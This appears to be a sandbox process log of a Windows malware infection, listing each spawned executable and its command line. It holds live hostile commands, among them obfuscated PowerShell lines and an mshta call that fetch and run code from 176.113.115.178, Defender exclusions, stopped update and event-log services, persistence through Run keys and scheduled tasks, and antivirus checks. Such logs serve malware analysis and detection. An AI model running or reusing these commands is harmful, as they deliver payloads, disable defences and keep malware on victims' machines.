"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x10c,0x254,0x7ff6849c5460,0x7ff6849c5470,0x7ff6849c5480

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1

C:\Windows\SysWOW64\fontdrvhost.exe

"C:\Windows\System32\fontdrvhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5744 -ip 5744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:1

C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe

"C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"

C:\Users\Admin\Desktop\a\7mpPLxE.exe

"C:\Users\Admin\Desktop\a\7mpPLxE.exe"

C:\Users\Admin\Desktop\a\7mpPLxE.exe

"C:\Users\Admin\Desktop\a\7mpPLxE.exe"

C:\Users\Admin\Desktop\a\0fVlNye.exe

"C:\Users\Admin\Desktop\a\0fVlNye.exe"

C:\Users\Admin\Desktop\Files\bwapp.exe

"C:\Users\Admin\Desktop\Files\bwapp.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Users\Admin\Desktop\Files\System.exe

"C:\Users\Admin\Desktop\Files\System.exe"

C:\Users\Admin\Desktop\Files\._cache_System.exe

"C:\Users\Admin\Desktop\Files\._cache_System.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Users\Admin\Desktop\Files\test5.exe

"C:\Users\Admin\Desktop\Files\test5.exe"

C:\Users\Admin\Desktop\Files\Opdxdyeul.exe

"C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"

C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe

"C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe"

C:\Users\Admin\Desktop\Files\v7wa24td.exe

"C:\Users\Admin\Desktop\Files\v7wa24td.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k move Dk Dk.cmd & Dk.cmd & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\._cache_System.exe'

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 29442

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com

Reynolds.com l

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SYSTEM32\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 217412

C:\Windows\SysWOW64\findstr.exe

findstr /V "PlasmaProfessionalConstitutesGuide" Cheaper

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N

C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif

Possibly.pif N

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1760 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAHAAZAB4AGQAeQBlAHUAbAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwARABlAHMAawB0AG8AcABcAEYAaQBsAGUAcwBcAE8AcABkAHgAZAB5AGUAdQBsAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABZAGoAbAB3AHUAdQB5AHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWQBqAGwAdwB1AHUAeQBzAC4AZQB4AGUA

C:\Users\Admin\Desktop\Files\Opdxdyeul.exe

"C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"

C:\Users\Admin\Desktop\a\IMG001.exe

"C:\Users\Admin\Desktop\a\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe

C:\Users\Admin\Desktop\a\rh.exe

"C:\Users\Admin\Desktop\a\rh.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im tftp.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Users\Admin\Desktop\a\file.exe

"C:\Users\Admin\Desktop\a\file.exe"

C:\Windows\SYSTEM32\wscript.exe

"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js

C:\Windows\SysWOW64\fontdrvhost.exe

"C:\Windows\System32\fontdrvhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4028 -ip 4028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 620

C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com

C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mshta.exe

mshta http://176.113.115.178/Windows-Update

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\

C:\Users\Admin\AppData\Local\Temp\tftp.exe

"C:\Users\Admin\AppData\Local\Temp\tftp.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\euoxkxg\cqibun.exe

"C:\ProgramData\euoxkxg\cqibun.exe"

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe

"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im tftp.exe

C:\Users\Admin\AppData\Roaming\LB31.exe

"C:\Users\Admin\AppData\Roaming\LB31.exe"

C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif

C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "LIB"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "LIB"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Mig\Mig.exe

C:\ProgramData\Mig\Mig.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\dialer.exe

dialer.exe

C:\Users\Admin\AppData\Local\Temp\tftp.exe

"C:\Users\Admin\AppData\Local\Temp\tftp.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 616 -p 7352 -ip 7352

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 7352 -s 540

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 660 -p 7352 -ip 7352

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 7352 -s 556

C:\ProgramData\euoxkxg\cqibun.exe

"C:\ProgramData\euoxkxg\cqibun.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -standby-timeout-ac 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -hibernate-timeout-ac 0

C:\Windows\SysWOW64\powercfg.exe

Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\grjujyNaBLaKbU.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp16B2.tmp"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe

"C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\Desktop\a\L.exe

"C:\Users\Admin\Desktop\a\L.exe"

C:\Users\Admin\Desktop\a\ttl.exe

"C:\Users\Admin\Desktop\a\ttl.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Dk.cmd

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\ProgramData\euoxkxg\cqibun.exe

"C:\ProgramData\euoxkxg\cqibun.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\ProgramData\euoxkxg\cqibun.exe

"C:\ProgramData\euoxkxg\cqibun.exe"

C:\Users\Admin\Desktop\Files\abc.exe

"C:\Users\Admin\Desktop\Files\abc.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\QzMSuoZ4.xlsm"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\ProgramData\Synaptics\Synaptics.exe

C:\ProgramData\Synaptics\Synaptics.exe

